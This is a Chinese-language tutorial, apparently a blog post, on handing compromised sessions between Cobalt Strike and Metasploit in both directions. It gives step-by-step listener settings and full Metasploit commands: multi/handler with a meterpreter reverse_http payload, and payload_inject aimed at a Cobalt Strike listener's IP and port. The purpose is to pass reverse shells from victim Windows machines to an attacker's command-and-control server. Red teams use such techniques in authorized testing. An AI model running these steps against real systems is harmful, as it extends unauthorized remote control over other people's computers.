CS委派给MSF

创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器

首先要创建一个会话,然后将权限反弹出去

1.创建Foreign监听器

“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”自己设定

这个监听器与木马绑定的监听器非同一个监听器

image-20220330202413109

2.MSF监听模块设置对应地址端口

选择监听模块

use exploit/multi/handler

设置payload,注意与CS保持一致

set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

set lhost 0.0.0.0

set lport 1234

检查设置

show options

执行

exploit

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器

image-20220330203152350

稍等可在MSF上看见反弹结果,如果没有请检查网络

image-20220330203211330

MSF委派给CS

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

1.CS创建监听器

创建一个普通的监听器

image-20220330204429548

2.MSF载入新模块注入设置对应地址端口

首先查看session值

background

sessions

image-20220330203245414

载入注入模块并设置,注意跟CS的监听器保持一致

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lport [CS监听端口号]

set lhost [CS的IP]

set session [session的id]

执行

exploit 

cs接收到

image-20220330204338660